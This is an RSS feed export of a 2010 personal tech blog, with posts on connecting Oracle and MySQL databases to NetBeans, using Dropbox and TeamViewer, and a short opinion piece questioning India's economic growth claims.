<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Dark Horizon</title>
	<atom:link href="http://magicalharsh.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://magicalharsh.com/blog</link>
	<description>Hack the World before its Hacked</description>
	<lastBuildDate>Mon, 12 Jul 2010 06:54:32 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Connecting DataBase to Netbeans IDE</title>
		<link>http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/</link>
		<comments>http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/#comments</comments>
		<pubDate>Thu, 08 Jul 2010 13:21:48 +0000</pubDate>
		<dc:creator>vibhu</dc:creator>
				<category><![CDATA[Java]]></category>
		<category><![CDATA[Oracle]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[java prgramming]]></category>
		<category><![CDATA[Jdbc programming]]></category>
		<category><![CDATA[Netbeans tutorial]]></category>
		<category><![CDATA[Oracle/sun developmet]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=726</guid>
		<description><![CDATA[
			
				
			
		
Netbeans is an IDE -a JavA editor provided by Sun Microsystem and it is open source (absolutely free!!)
From last few days i was having problem in my JDBC programming while connecting the ORACLE server to the Netbeans. But finally i have solved it by the help of my senior. But when i was surfing the [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fconnecting-database-to-netbeans-ide%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fconnecting-database-to-netbeans-ide%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://www.netbeans.org/"><img title="Netbeans" src="http://img704.imageshack.us/img704/6972/netbeanslogo.png" alt="" width="100" height="100" align="left" /></a><strong>Netbeans is an IDE -a JavA editor provided by Sun Microsystem and it is open source (absolutely free!!)</strong><br />
From last few days i was having problem in my JDBC programming while connecting the ORACLE server to the Netbeans. But finally i have solved it by the help of my senior. But when i was surfing the solution on the internet,it is almost very difficult to search it on <em>Google</em>..and found some forums where where the same problem was discussed but no one tells the appropriate answer.. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  so i thought i should help my friends <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .<br />
Generally in java we use only two database Oracle and Mysql,both vendor provides the jar files which contains classes for the jdbc-driver.I m going to describe both connectivity one by one . <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<blockquote><p><strong>ORACLE DATABASE</strong></p></blockquote>
<p><a href="http://www.oracle.com"><img title="Oracle" src="http://img704.imageshack.us/img704/1024/oraclelogo3.jpg" alt="" width="100" height="80" align="right" /></a><br />
ORACLE DATABASE is very easy to install . I think you have already installed it i m just going to explain it&#8217;s connectivity with Netbeans</p>
<ol>First run the Netbeans IDE .and open the Service window..</ol>
<ol>In service window click on Database expand it and the right click on the Driver ,then add new driver. It will demand for jar file .which is oracle14.jar browse it from <strong>C:\oraclexe\app\oracle\product\10.2.0\server\jdbc\lib\oracle14.jar</strong></ol>
<ol>Then right click on the database and then Add new connection it will pop-up a new window like below.:)</ol>
<p><a href="http://img534.imageshack.us/img534/9628/fullscreencapture080720.jpg"><img title="New Connection" src="http://img534.imageshack.us/img534/9628/fullscreencapture080720.jpg" alt="" width="400" height="336" /></a></p>
<ol>You can fill the text boxes like shown in image or go to direct URL and paste this url <strong>jdbc:oracle:thin:@//localhost:1521/XE</strong></ol>
<ol>now click next and and then select the schema .. then OK. Now u will find a new driver by expanding the database. you simply right click on the driver and click connect ,it will ask for the password of the database then you can execute your sql command on the netbeans like this :</ol>
<p><a href="http://img683.imageshack.us/img683/9628/fullscreencapture080720.jpg"><img title="essai" src="http://img683.imageshack.us/img683/9628/fullscreencapture080720.jpg" alt="" width="400" height="270" /></a></p>
<ol>Now it&#8217;s time for some jdbc programming , first to use sql queries in your programming you have to import oracle jdbc library to you library folder for this just Right click on the project library folder and then Add new Library, the oracle library will be not there you have to create it <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  . for this go to create it will pop a window ,in name put oracle and select class library the add new jar file from <strong>C:\oraclexe\app\oracle\product\10.2.0\server\jdbc\lib\oracle14.jar</strong> then OK . library has been created select it and the the library will be added to your library folder.</ol>
<ol>And to connect it from your program you have to put <strong>&#8220;jdbc:oracle:thin:@//localhost:1521/XE&#8221;;</strong> as your URL and <strong>&#8220;oracle.jdbc.OracleDriver&#8221;</strong> as your driver it&#8217;s simple <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </ol>
<p><strong><em> Now your Netbeans is ready Oracle Database Programming with JAVA</em></strong></p>
<blockquote><p>My SQL DATABASE</p></blockquote>
<p><a href="http://www.mysql.com"><img title="Mysql" src="http://img704.imageshack.us/img704/6600/mysql.gif" alt="" width="100" height="167" align="right" /></a><br />
Now it&#8217;s turn for MySql database . it&#8217;s very simple to install and many of the student who learns database connectivity opt mysql as their database..is&#8217;t connectivity with Netbeans is very simple just few steps <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<ol>You don&#8217;t have to add new driver here ,it is provided by Netbeans. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Just go to database the right click and add new connection a pop window show as below will appear: <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </ol>
<p><a href="http://img46.imageshack.us/img46/9628/fullscreencapture080720.jpg"><img title="essai" src="http://img46.imageshack.us/img46/9628/fullscreencapture080720.jpg" alt="" width="400" height="337" /></a></p>
<ol>You can fill the boxes ,as shown in figure <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  but first you have to create a database in your sql server. Or you cal select direct URL and put the following url <strong>jdbc:mysql://localhost:3306/dbforplacement(&#8220;dbforplacement&#8221; is my database name)</strong>. Then click ok and it&#8217;s over .</ol>
<ol>Now for JDBC programming you to Add mysql jdbc library to your library folder of your project for this just go to library right click on this and then Add new library .<br />
here you will find Mysql-jdbc library as netbeans provide it just add it and then ok <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </ol>
<ol>Now in your program you have to use<strong> &#8220;jdbc:mysql://localhost:3306/dbforplacement&#8221;(&#8220;dbforplacement&#8221; is my database name) </strong>as the URL of the Database and<strong> &#8220;com.mysql.jdbc.Driver&#8221;</strong> as driver..</ol>
<p><strong>Now you are ready with MySql database server connected with Netbeans IDE to learn database programming in JAVA <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </strong></p>
<p><em>you can comment below for your Queries.. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </em></p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/&amp;title=Connecting+DataBase+to+Netbeans+IDE+" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/&amp;t=Connecting+DataBase+to+Netbeans+IDE+" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Connecting+DataBase+to+Netbeans+IDE++-+http://b2l.me/9p6ap+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/&amp;title=Connecting+DataBase+to+Netbeans+IDE+&amp;summary=Netbeans%20is%20an%20IDE%20-a%20JavA%20editor%20provided%20by%20Sun%20Microsystem%20and%20it%20is%20open%20source%20%28absolutely%20free%21%21%29%0D%0AFrom%20last%20few%20days%20i%20was%20having%20problem%20in%20my%20JDBC%20programming%20while%20connecting%20the%20ORACLE%20server%20to%20the%20Netbeans.%20But%20finally%20i%20have%20solved%20it%20by%20the%20help%20of%20my%20senior.%20But%20when%20i%20was%20surfing%20th&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Connecting+DataBase+to+Netbeans+IDE+&amp;du=http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/&amp;cn=Netbeans%20is%20an%20IDE%20-a%20JavA%20editor%20provided%20by%20Sun%20Microsystem%20and%20it%20is%20open%20source%20%28absolutely%20free%21%21%29%0D%0AFrom%20last%20few%20days%20i%20was%20having%20problem%20in%20my%20JDBC%20programming%20while%20connecting%20the%20ORACLE%20server%20to%20the%20Netbeans.%20But%20finally%20i%20have%20solved%20it%20by%20the%20help%20of%20my%20senior.%20But%20when%20i%20was%20surfing%20th" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li>No related posts.</li>
	</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/connecting-database-to-netbeans-ide/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>DropBOx-share File smartly</title>
		<link>http://magicalharsh.com/blog/dropbox-share-file-smartly/</link>
		<comments>http://magicalharsh.com/blog/dropbox-share-file-smartly/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 19:04:34 +0000</pubDate>
		<dc:creator>vibhu</dc:creator>
				<category><![CDATA[Social]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[softwares]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Dropbox]]></category>
		<category><![CDATA[online sharing]]></category>
		<category><![CDATA[utility tools]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=698</guid>
		<description><![CDATA[
			
				
			
		
DROPBOX is used for online back up file sharing and file synchronizing
 
 Oh !! I dn&#8217;t have the Pen drive ,and i want these file to be with me as i m leaving from the city  . 
 I m working on some project .and i want my partner to get program files [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fdropbox-share-file-smartly%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fdropbox-share-file-smartly%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://img690.imageshack.us/img690/5638/dropboxlogohome.png"><img class="alignleft size-full wp-image-699" src="http://img690.imageshack.us/img690/5638/dropboxlogohome.png" alt="" width="290" height="75" /></a><strong>DROPBOX</strong><em> is used for online back up file sharing and file synchronizing</em></p>
<p><em> </em></p>
<ul> <em>Oh !! I dn&#8217;t have the Pen drive ,and i want these file to be with me as i m leaving from the city <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> . </em></ul>
<ul><em> I m working on some project .and i want my partner to get program files in a sync manner and in a very fast way. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </em></ul>
<ul><em> I want online back up of my important files ..</em></ul>
<p><em> </em></p>
<p>The one and the very best solution till now is The DROPBOX. It work like a box in which u can put your files and the box is saved at internet. you are somewhere away from your system and want to work on these files ,now you can just work on it modify it you will found that it was modified on yous system also in a sync manner. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
It is open source Software and can easily be downloaded at company&#8217;s website <a href="http://www.dropbox.com">DropBox.com</a> and easy to install at any Platform Windows ,linux or Mac .</p>
<p>After installing it you will see an icon at your desktop and you can make account of your email id .<br />
it also create a folder as the child of your documents folder like this:-<br />
<a href="http://img689.imageshack.us/img689/2026/fullscreencapture070720.jpg"><img class="aligncenter size-full wp-image-713" src="http://img689.imageshack.us/img689/2026/fullscreencapture070720.jpg" alt="" width="741" height="394" /></a></p>
<p><em>you can make a new folder rename it and then put right click ,go to dropbox menu and make it share with other users to share it on internet with your partners.</em></p>
<p><strong>FEATURES-</strong></p>
<p><strong><em>File Sync</em></strong><em> </em><br />
Dropbox allows u to sync file to your computers through internet</p>
<ul> Sync files of any size or type.Automatically syncs when new files or changes are detected.</ul>
<ul>Work on files in your Dropbox even if you&#8217;re offline. Your changes sync once your computer has an Internet connection again.</ul>
<p><strong><em>File Sharing</em></strong><br />
sharing of files can easily be done at internet or by your system with other users..</p>
<ul> Shared folders allow several people to collaborate on a set of files.And You can see other people&#8217;s changes instantly.</ul>
<ul> You can control people to able to access the shared folder and can easily kick them .. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </ul>
<p><strong><em>Online backup</em></strong><br />
Dropbox back up your files automatically when you put those files on the dropbox folder</p>
<p><strong>and tho other more like web access ,security and privacy ,mobile device access..and many more <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </strong></p>
<blockquote><p>Today many company use this dropbox in their project making and m also having full benefit . Just try it !!!!</p></blockquote>
<p>More Information about Dropbox see <a href="http://www.dropbox.com"><strong>Dropbox.com</strong></a></p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/dropbox-share-file-smartly/&amp;title=DropBOx-share+File+smartly" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/dropbox-share-file-smartly/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/dropbox-share-file-smartly/&amp;t=DropBOx-share+File+smartly" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=DropBOx-share+File+smartly+-+http://b2l.me/9amc3+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/dropbox-share-file-smartly/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/dropbox-share-file-smartly/&amp;title=DropBOx-share+File+smartly&amp;summary=DROPBOX%20is%20used%20for%20online%20back%20up%20file%20sharing%20and%20file%20synchronizing%0D%0A%0D%0A%20%0D%0A%20Oh%20%21%21%20I%20dn%27t%20have%20the%20Pen%20drive%20%2Cand%20i%20want%20these%20file%20to%20be%20with%20me%20as%20i%20m%20leaving%20from%20the%20city%20%3A%28.%20%0D%0A%20I%20m%20working%20on%20some%20project%20.and%20i%20want%20my%20partner%20to%20get%20program%20files%20in%20a%20sync%20manner%20and%20in%20a%20very%20fast%20way.%20%3A%29%0D%0A&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=DropBOx-share+File+smartly&amp;du=http://magicalharsh.com/blog/dropbox-share-file-smartly/&amp;cn=DROPBOX%20is%20used%20for%20online%20back%20up%20file%20sharing%20and%20file%20synchronizing%0D%0A%0D%0A%20%0D%0A%20Oh%20%21%21%20I%20dn%27t%20have%20the%20Pen%20drive%20%2Cand%20i%20want%20these%20file%20to%20be%20with%20me%20as%20i%20m%20leaving%20from%20the%20city%20%3A%28.%20%0D%0A%20I%20m%20working%20on%20some%20project%20.and%20i%20want%20my%20partner%20to%20get%20program%20files%20in%20a%20sync%20manner%20and%20in%20a%20very%20fast%20way.%20%3A%29%0D%0A" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li><a href="http://magicalharsh.com/blog/teamviewer-an-important-project-tool/" title="Teamviewer -an important project tool (July 5, 2010)">Teamviewer -an important project tool</a> </li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/dropbox-share-file-smartly/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Teamviewer -an important project tool</title>
		<link>http://magicalharsh.com/blog/teamviewer-an-important-project-tool/</link>
		<comments>http://magicalharsh.com/blog/teamviewer-an-important-project-tool/#comments</comments>
		<pubDate>Mon, 05 Jul 2010 18:00:48 +0000</pubDate>
		<dc:creator>vibhu</dc:creator>
				<category><![CDATA[Social]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[softwares]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Remote computing]]></category>
		<category><![CDATA[Teamviewer]]></category>
		<category><![CDATA[utility tools]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=686</guid>
		<description><![CDATA[
			
				
			
		
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fteamviewer-an-important-project-tool%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fteamviewer-an-important-project-tool%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http:www.teamviewer.org"><img src="http://img534.imageshack.us/img534/6814/teamviewericon.png" width="100" height="100" " alt="" title="teamviewer" align="left"/></a><br />
<blockquote><strong>TeamViewer-the All-in-one solution for the Remote Access and support over the Internet </strong></p></blockquote>
<p>This is the punch line of the Company ,and i also feel personally that it is the best. <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .  TeamViewer is one of the world wide leading solutions for desktop sharing and online collaboration over the Internet.By Teamviewer you can help and remotely access your friend computer as it in front of you..and can help him by working at your laptop or system. it works on any platform Windows ,linux, Mac..etc.<br />
you can simply download it from <a href="http://www.teamviewer.com/download/TeamViewerQS.exe"><em>here</em></a><br />
installation process is very easy ..simply next ..next..next  <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /><br />
then when you run it a window appears ..but please please please install it at least on two systems as the other one is the system you want to access remotely.<br />
<a href="http://img130.imageshack.us/img130/9463/fullscreencapture050720.jpg"><img class="aligncenter size-full wp-image-687" src="http://img130.imageshack.us/img130/9463/fullscreencapture050720.jpg" alt="Teamviewer window" width="595" height="350" /></a><br />
And one important note -the version of Teamviewer at both the system should be same ..<br />
<strong>In create session you have to enter the ID of the of other system and select the type of access given below it .And if the other one wants to see your desktop they have to know the Id and password given at your window.when you click on <em>&#8220;Connect to partner&#8221;</em> it demands for the password of the other&#8217;s system,after filling the password a connection is established.and you can see your partner desktop at a separate window..:)</strong><br />
Don&#8217;t bother about the security about your system while making this connection because the password is changed every time you run it on your system so no one can make a permanent connection without your permission <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /><br />
you can also record the session and watch it later ,can transfer the files to your partner.make a VPN(virtual private network) connection,and use it as a presentation .so it&#8217;s a very important utility tool for project making.<br />
enjoy it , it&#8217;s very helpful <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/teamviewer-an-important-project-tool/&amp;title=Teamviewer+-an+important+project+tool" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/teamviewer-an-important-project-tool/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/teamviewer-an-important-project-tool/&amp;t=Teamviewer+-an+important+project+tool" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Teamviewer+-an+important+project+tool+-+http://b2l.me/82tud+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/teamviewer-an-important-project-tool/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/teamviewer-an-important-project-tool/&amp;title=Teamviewer+-an+important+project+tool&amp;summary=&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Teamviewer+-an+important+project+tool&amp;du=http://magicalharsh.com/blog/teamviewer-an-important-project-tool/&amp;cn=" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li><a href="http://magicalharsh.com/blog/dropbox-share-file-smartly/" title="DropBOx-share File smartly (July 6, 2010)">DropBOx-share File smartly</a> </li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/teamviewer-an-important-project-tool/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>superficial growth</title>
		<link>http://magicalharsh.com/blog/superficial-growth/</link>
		<comments>http://magicalharsh.com/blog/superficial-growth/#comments</comments>
		<pubDate>Sun, 18 Apr 2010 21:39:12 +0000</pubDate>
		<dc:creator>sanchit</dc:creator>
				<category><![CDATA[India]]></category>
		<category><![CDATA[delhi]]></category>
		<category><![CDATA[india development]]></category>
		<category><![CDATA[super power]]></category>
		<category><![CDATA[superficial fact]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=681</guid>
		<description><![CDATA[
			
				
			
		
just gone through that india would be the superpower in 2020 and the strongest economy in 2050 .
i think that from the past 3 years i am hearing it for the 240th time to be precise
have no idea how predictions are made?whether to keep  u the global image of india in global market or showcasing [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fsuperficial-growth%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fsuperficial-growth%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>just gone through that india would be the superpower in 2020 and the strongest economy in 2050 .</p>
<p>i think that from the past 3 years i am hearing it for the 240th time to be precise</p>
<p>have no idea how predictions are made?whether to keep  u the global image of india in global market or showcasing government&#8217;s good economic policies might be the hidden agenda behind this.</p>
<p>to be a bit calculative india is the 12 th largest economy in the world .our gdp [gross domestic product]measured on various parameters chiefly consisting productions n income within a country is 7.2% and would be 9% by the end of next year and to be true this is great recovery post slowdown.we have the largest people&#8217;s purchasing power in the world and besides <strong>u.s. </strong>and <strong>china </strong>the world is looking to india for a evolving centre of plushing life.</p>
<p>but is this really true????</p>
<p>rather is it credible enough?????????</p>
<p>there is no doubt that the year 1991 gave great economic reforms to india by liberalizing foreign market in india and all credit goes to dr. manmohan singh ,but does that makes us the place to be in the world in the future???????</p>
<p>in my view not only it is canard but a hidden agenda to publicize the good work of our past governments chiefly congress</p>
<blockquote><p><strong>just have a look</strong></p>
<p>our metro cities regarded one of the best do not have proper water to drink ,don&#8217;t  go too far delhi is a prime example .almost 60% of ppl in these cities face acute water shortage problem.leave alone water ,there are still thousands of villages which haven&#8221;t seen electricity ost-independence [<strong>imagine no electricity in today's world]</strong> . 70% of our population doesn&#8217;t have proper water to drink ,neither the essence comforts of electricity and these were the basic amenities !!!!!god knows how poor are the other services given to us are</p>
<p>they say india has the biggest purchaing power but do we??????infact we are spending more than we are earning  ,thanx to the easy loan schemes available nowdays which is a headache later to the customer</p>
<p>the development of india is limited to somewhat 30% of it&#8217;s population which is kept in a nutshell and showed the booming economy of our country</p>
<p>infact the rich has got richer n the poor has got poorer,such are the income inequalities .what is the meaning of development if it is only confined to 30% of population of a country??????????????</p>
<p>the biggest loophole in our economic standings which is rs 64,61,000 crore is the 40% share of fake currency in it. further black money is also eating up our real economy and posing a strong virtual economy .</p>
<p>the truth is exposed and the future shall be dealt with&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..</p></blockquote>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/superficial-growth/&amp;title=superficial+growth" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/superficial-growth/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/superficial-growth/&amp;t=superficial+growth" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=superficial+growth+-+http://b2l.me/p3dp7+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/superficial-growth/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/superficial-growth/&amp;title=superficial+growth&amp;summary=just%20gone%20through%20that%20india%20would%20be%20the%20superpower%20in%202020%20and%20the%20strongest%20economy%20in%202050%20.%0D%0A%0D%0Ai%20think%20that%20from%20the%20past%203%20years%20i%20am%20hearing%20it%20for%20the%20240th%20time%20to%20be%20precise%0D%0A%0D%0Ahave%20no%20idea%20how%20predictions%20are%20made%3Fwhether%20to%20keep%C2%A0%20u%20the%20global%20image%20of%20india%20in%20global%20market%20or%20showcasin&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
